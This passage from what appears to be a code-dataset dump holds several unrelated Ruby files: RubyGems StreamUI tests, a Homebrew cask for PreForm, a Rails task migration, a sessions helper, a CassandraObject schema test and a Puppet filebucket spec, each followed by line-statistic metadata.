@out.extend IsTty
@sui = Gem::StreamUI.new @in, @out, @err, true
end
def test_ask
Timeout.timeout(5) do
expected_answer = "Arthur, King of the Britons"
@in.string = "#{expected_answer}\n"
actual_answer = @sui.ask("What is your name?")
assert_equal expected_answer, actual_answer
end
end
def test_ask_no_tty
@in.tty = false
Timeout.timeout(SHORT_TIMEOUT) do
answer = @sui.ask("what is your favorite color?")
assert_nil answer
end
end
def test_ask_for_password
Timeout.timeout(5) do
expected_answer = "Arthur, King of the Britons"
@in.string = "#{expected_answer}\n"
actual_answer = @sui.ask_for_password("What is your name?")
assert_equal expected_answer, actual_answer
end
end
def test_ask_for_password_no_tty
@in.tty = false
Timeout.timeout(SHORT_TIMEOUT) do
answer = @sui.ask_for_password("what is the airspeed velocity of an unladen swallow?")
assert_nil answer
end
end
def test_ask_yes_no_no_tty_with_default
@in.tty = false
Timeout.timeout(SHORT_TIMEOUT) do
answer = @sui.ask_yes_no("do coconuts migrate?", false)
assert_equal false, answer
answer = @sui.ask_yes_no("do coconuts migrate?", true)
assert_equal true, answer
end
end
def test_ask_yes_no_no_tty_without_default
@in.tty = false
Timeout.timeout(SHORT_TIMEOUT) do
assert_raises(Gem::OperationNotSupportedError) do
@sui.ask_yes_no("do coconuts migrate?")
end
end
end
def test_choose_from_list
@in.puts "1"
@in.rewind
result = @sui.choose_from_list 'which one?', %w[foo bar]
assert_equal ['foo', 0], result
assert_equal "which one?\n 1. foo\n 2. bar\n> ", @out.string
end
def test_choose_from_list_EOF
result = @sui.choose_from_list 'which one?', %w[foo bar]
assert_equal [nil, nil], result
assert_equal "which one?\n 1. foo\n 2. bar\n> ", @out.string
end
def test_progress_reporter_silent_nil
@cfg.verbose = nil
reporter = @sui.progress_reporter 10, 'hi'
assert_kind_of Gem::StreamUI::SilentProgressReporter, reporter
end
def test_progress_reporter_silent_false
@cfg.verbose = false
reporter = @sui.progress_reporter 10, 'hi'
assert_kind_of Gem::StreamUI::SilentProgressReporter, reporter
assert_equal "", @out.string
end
def test_progress_reporter_simple
@cfg.verbose = true
reporter = @sui.progress_reporter 10, 'hi'
assert_kind_of Gem::StreamUI::SimpleProgressReporter, reporter
assert_equal "hi\n", @out.string
end
def test_progress_reporter_verbose
@cfg.verbose = 0
reporter = @sui.progress_reporter 10, 'hi'
assert_kind_of Gem::StreamUI::VerboseProgressReporter, reporter
assert_equal "hi\n", @out.string
end
def test_download_reporter_silent_nil
@cfg.verbose = nil
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
assert_kind_of Gem::StreamUI::SilentDownloadReporter, reporter
assert_equal "", @out.string
end
def test_download_reporter_silent_false
@cfg.verbose = false
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
assert_kind_of Gem::StreamUI::SilentDownloadReporter, reporter
assert_equal "", @out.string
end
def test_download_reporter_anything
@cfg.verbose = 0
reporter = @sui.download_reporter
assert_kind_of Gem::StreamUI::ThreadedDownloadReporter, reporter
end
def test_threaded_download_reporter
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
reporter.update 512
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress_once
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
reporter.update 510
reporter.update 512
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress_complete
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
reporter.update 510
reporter.done
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress_nil_length
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', nil
reporter.update 1024
reporter.done
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress_zero_length
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 0
reporter.update 1024
reporter.done
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_no_tty
@out.tty = false
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
assert_equal "", @out.string
end
end
| 25.690583 | 131 | 0.701519 |
03f5600887dfd599e3424d18c46dae05b7ad726c | 121 | require './app/helpers/deciders'
def check_contests(state)
contesting_heads(state[:you], state[:board][:snakes])
end
| 20.166667 | 56 | 0.743802 |
79adab47a7c3039edd555c5c211381a7737e3637 | 624 | cask 'preform' do
version '3.0.6,1416'
sha256 '4616eac714ded48575d03d1409e142980c7b6635bca6137587ad0e20cf0b36b2'
# s3.amazonaws.com/FormlabsReleases was verified as official when first introduced to the cask
url "https://s3.amazonaws.com/FormlabsReleases/Release/#{version.before_comma}/PreForm_#{version.before_comma}_release_origin_release_#{version.before_comma}_build_#{version.after_comma}.dmg"
appcast 'https://macupdater.net/cgi-bin/check_urls/check_url_redirect.cgi?url=https://formlabs.com/download-preform-mac/'
name 'PreForm'
homepage 'https://formlabs.com/tools/preform/'
app 'PreForm.app'
end
| 48 | 193 | 0.801282 |
03ce22d3d413ad93d3db56d496a80fff1e3e0ea4 | 841 | class BeTaskableMigration < ActiveRecord::Migration
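  # Creates the be_taskable_tasks and be_taskable_task_assignments tables
  # (both dropped again in self.down).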
def self.up
create_table :be_taskable_tasks do |t|
t.string :action
t.references :taskable, polymorphic: true
t.string :state
t.string :label
t.datetime :completed_at
t.datetime :expired_at
t.timestamps
end
create_table :be_taskable_task_assignments do |t|
t.integer :task_id
t.references :assignee, polymorphic: true
t.string :label
t.string :url
t.boolean :confirmed
t.boolean :enacted
t.datetime :visible_at
t.datetime :complete_by
t.datetime :completed_at
t.datetime :expired_at
t.timestamps
end
add_index :be_taskable_tasks, [:taskable_id, :taskable_type]
add_index :be_taskable_task_assignments, :task_id
end
def self.down
drop_table :be_taskable_tasks
drop_table :be_taskable_task_assignments
end
end | 24.028571 | 62 | 0.747919 |
4a00bdef1c58e9b747ea621bf63dfcef233d9cc9 | 630 | require 'test_helper'
class CassandraObject::Schema::TasksTest < CassandraObject::TestCase
test "table_names" do
assert_equal ['Issues'], CassandraObject::Schema.table_names
end
test "dump" do
io = StringIO.new
CassandraObject::Schema.dump(io)
io.rewind
    assert_match(/Issues/, io.read)
end
test "load" do
CassandraObject::Schema.expects(:keyspace_execute).with("DO STUFF;")
CassandraObject::Schema.expects(:keyspace_execute).with("AND MORE;")
CassandraObject::Schema.load StringIO.new(
"DO\n" +
" STUFF;\n" +
"\n" +
"AND\n" +
" MORE;\n"
)
end
end
| 21 | 72 | 0.653968 |
ab2b173e76abd9c8efd23a4cb8da4166a3bf4d2d | 135 | #!/usr/bin/env ruby
require 'benchmark'
require './lib/constant'
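# bmbm runs a rehearsal pass before the timed pass so warm-up costs don't skew the result.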
Benchmark.bmbm do |x|
x.report('constant(1)') { constant(1) }
end
| 15 | 41 | 0.674074 |
3845a147597f36fb79006cceb4b8c944f7db50e3 | 1,506 | module SessionsHelper
# Logs in the given user.
def log_in(user)
session[:user_id] = user.id
end
# Remembers a user in a persistent session.
def remember(user)
user.remember
cookies.permanent.signed[:user_id] = user.id
cookies.permanent[:remember_token] = user.remember_token
end
# Returns true if the given user is the current user.
def current_user?(user)
user == current_user
end
# Returns the current logged-in user (if any).
def current_user
if (user_id = session[:user_id])
@current_user ||= User.find_by(id: user_id)
elsif (user_id = cookies.signed[:user_id])
user = User.find_by(id: user_id)
if user && user.authenticated?(cookies[:remember_token])
log_in user
@current_user = user
end
end
end
# Returns true if the user is logged in, false otherwise.
def logged_in?
!current_user.nil?
end
# Forgets a persistent session.
def forget(user)
user.forget
cookies.delete(:user_id)
cookies.delete(:remember_token)
end
# Logs out the current user.
def log_out
forget(current_user)
session.delete(:user_id)
@current_user = nil
end
# Redirects to stored location (or to the default).
def redirect_back_or(default)
redirect_to(session[:forwarding_url] || default)
session.delete(:forwarding_url)
end
# Stores the URL trying to be accessed.
def store_location
session[:forwarding_url] = request.original_url if request.get?
end
end
| 24.688525 | 67 | 0.688579 |
f86886faa0e08b2e4d15e461a4da8fc0c0d02745 | 5,596 | #!/usr/bin/env rspec
require 'spec_helper'
require 'puppet/application/filebucket'
require 'puppet/file_bucket/dipper'
describe Puppet::Application::Filebucket do
before :each do
@filebucket = Puppet::Application[:filebucket]
end
it "should declare a get command" do
@filebucket.should respond_to(:get)
end
it "should declare a backup command" do
@filebucket.should respond_to(:backup)
end
it "should declare a restore command" do
@filebucket.should respond_to(:restore)
end
[:bucket, :debug, :local, :remote, :verbose].each do |option|
it "should declare handle_#{option} method" do
@filebucket.should respond_to("handle_#{option}".to_sym)
end
it "should store argument value when calling handle_#{option}" do
@filebucket.options.expects(:[]=).with("#{option}".to_sym, 'arg')
@filebucket.send("handle_#{option}".to_sym, 'arg')
end
end
describe "during setup" do
before :each do
Puppet::Log.stubs(:newdestination)
Puppet.stubs(:settraps)
Puppet.stubs(:parse_config)
Puppet::FileBucket::Dipper.stubs(:new)
@filebucket.options.stubs(:[]).with(any_parameters)
end
it "should set console as the log destination" do
Puppet::Log.expects(:newdestination).with(:console)
@filebucket.setup
end
it "should trap INT" do
Signal.expects(:trap).with(:INT)
@filebucket.setup
end
it "should set log level to debug if --debug was passed" do
@filebucket.options.stubs(:[]).with(:debug).returns(true)
@filebucket.setup
Puppet::Log.level.should == :debug
end
it "should set log level to info if --verbose was passed" do
@filebucket.options.stubs(:[]).with(:verbose).returns(true)
@filebucket.setup
Puppet::Log.level.should == :info
end
it "should Parse puppet config" do
Puppet.expects(:parse_config)
@filebucket.setup
end
it "should print puppet config if asked to in Puppet config" do
Puppet.settings.stubs(:print_configs?).returns(true)
Puppet.settings.expects(:print_configs).returns(true)
expect { @filebucket.setup }.to exit_with 0
end
it "should exit after printing puppet config if asked to in Puppet config" do
Puppet.settings.stubs(:print_configs?).returns(true)
expect { @filebucket.setup }.to exit_with 1
end
describe "with local bucket" do
before :each do
@filebucket.options.stubs(:[]).with(:local).returns(true)
end
it "should create a client with the default bucket if none passed" do
Puppet.stubs(:[]).with(:bucketdir).returns("path")
Puppet::FileBucket::Dipper.expects(:new).with { |h| h[:Path] == "path" }
@filebucket.setup
end
it "should create a local Dipper with the given bucket" do
@filebucket.options.stubs(:[]).with(:bucket).returns("path")
Puppet::FileBucket::Dipper.expects(:new).with { |h| h[:Path] == "path" }
@filebucket.setup
end
end
describe "with remote bucket" do
it "should create a remote Client to the configured server" do
Puppet.stubs(:[]).with(:server).returns("puppet.reductivelabs.com")
Puppet::FileBucket::Dipper.expects(:new).with { |h| h[:Server] == "puppet.reductivelabs.com" }
@filebucket.setup
end
end
end
describe "when running" do
before :each do
Puppet::Log.stubs(:newdestination)
Puppet.stubs(:settraps)
Puppet.stubs(:parse_config)
Puppet::FileBucket::Dipper.stubs(:new)
@filebucket.options.stubs(:[]).with(any_parameters)
@client = stub 'client'
Puppet::FileBucket::Dipper.stubs(:new).returns(@client)
@filebucket.setup
end
it "should use the first non-option parameter as the dispatch" do
@filebucket.command_line.stubs(:args).returns(['get'])
@filebucket.expects(:get)
@filebucket.run_command
end
describe "the command get" do
before :each do
@filebucket.stubs(:print)
@filebucket.stubs(:args).returns([])
end
it "should call the client getfile method" do
@client.expects(:getfile)
@filebucket.get
end
it "should call the client getfile method with the given md5" do
md5="DEADBEEF"
@filebucket.stubs(:args).returns([md5])
@client.expects(:getfile).with(md5)
@filebucket.get
end
it "should print the file content" do
@client.stubs(:getfile).returns("content")
@filebucket.expects(:print).returns("content")
@filebucket.get
end
end
describe "the command backup" do
it "should fail if no arguments are specified" do
@filebucket.stubs(:args).returns([])
lambda { @filebucket.backup }.should raise_error
end
it "should call the client backup method for each given parameter" do
@filebucket.stubs(:puts)
FileTest.stubs(:exists?).returns(true)
FileTest.stubs(:readable?).returns(true)
@filebucket.stubs(:args).returns(["file1", "file2"])
@client.expects(:backup).with("file1")
@client.expects(:backup).with("file2")
@filebucket.backup
end
end
describe "the command restore" do
it "should call the client getfile method with the given md5" do
md5="DEADBEEF"
file="testfile"
@filebucket.stubs(:args).returns([file, md5])
@client.expects(:restore).with(file,md5)
@filebucket.restore
end
end
end
end
| 26.027907 | 102 | 0.642959 |